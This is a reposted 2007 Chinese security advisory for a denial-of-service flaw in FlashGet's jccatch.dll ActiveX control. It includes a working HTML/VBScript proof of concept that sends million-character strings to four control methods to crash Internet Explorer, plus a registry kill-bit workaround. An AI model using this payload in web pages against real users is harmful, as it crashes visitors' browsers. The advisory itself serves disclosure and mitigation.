FlashGet jccatch.dll ActiveX控件多个拒绝服务漏洞-控件新闻-慧都网

产品

产品
资讯
资源
视频
学院
示例

首页 > 资讯 > FlashGet jccatch.dll ActiveX控件多个拒绝服务漏洞

FlashGet jccatch.dll ActiveX控件多个拒绝服务漏洞

翻译|其它|编辑：郝浩|2007-10-22 09:56:47.000|阅读 1059 次

概述：

# 界面/图表报表/文档/IDE等千款热门软控件火热销售中 >>

Submitted by 7jdg on 2007, October 20, 3:00 PM. 溢出

受影响的系统
FlashGet 1.9.6.1073

描述：

FlashGet－全球最多人使用的下载工具。可支持多种资源格式。
IE 浏览器在以畸形参数调用 FlashGet 的 jccatch.dll ActiveX 控件时存在漏洞，恶意网站可能利用此漏洞导致用户浏览器崩溃。
如果用户受骗打开了恶意的 WEB 页面的话，就会触发这个漏洞，导致浏览器崩溃。

测试方法

XML/HTML 代码

-----------------------------------------------------------------------------<br>
FlashGet jccatch.dll multiple methods Denial of Service<br>
site: http://1v1.name<br>
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6<br>
-----------------------------------------------------------------------------<br>
<object classid='clsid:FB5DA724-162B-11D3-8B9B-AA70B4B0B524' id='FlashGet'></object>
<select name="Pucca">
<option value = "AddUrl">AddUrl</option>
<option value = "AddFgUrl">AddFgUrl</option>
<option value = "IsUrlExist">IsUrlExist</option>
<option value = "Initialize">Initialize</option>
</select>
<input language=VBScript onclick=tryMe() type=button value="测试">
<script language='vbscript'>
Sub tryMe
on error resume next
if Pucca.value="AddUrl" then
argCount = 3
arg1="defaultV"
arg2="defaultV"
arg3=String(1000000, "A")
FlashGet.AddUrl arg1 ,arg2 ,arg3
elseif Pucca.value="AddFgUrl" then
argCount = 3
arg1="defaultV"
arg2="defaultV"
arg3=String(1000000, "A")
FlashGet.AddFgUrl arg1 ,arg2 ,arg3
elseif Pucca.value="IsUrlExist" then
argCount = 1
arg1=String(1000000, "A")
FlashGet.IsUrlExist arg1
elseif Pucca.value = "Initialize" then
argCount = 2
arg1="defaultV"
arg2=String(1000000, "A")
FlashGet.Initialize arg1 ,arg2
end if
End Sub
</script>

临时解决方法：

在 IE 中禁用 FlashGet jccatch.dll　ActiveX 控件，为以下 CLSID 设置 kill bit：
{FB5DA724-162B-11D3-8B9B-AA70B4B0B524}

或将以下文本保存为.REG 文件并导入：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FB5DA724-162B-11D3-8B9B-AA70B4B0B524}]
"Compatibility Flags"=dword:00000400

标签：

本站文章除注明转载外，均为本站原创或翻译。欢迎任何形式的转载，但请务必注明出处、不得修改原文相关链接，如果存在内容上的异议请邮件反馈至chenjj@evget.com

文章转载自：csdn

上一篇：能够选择时间的 JS 日历时间输入控件下一篇：APS.NET中的验证控件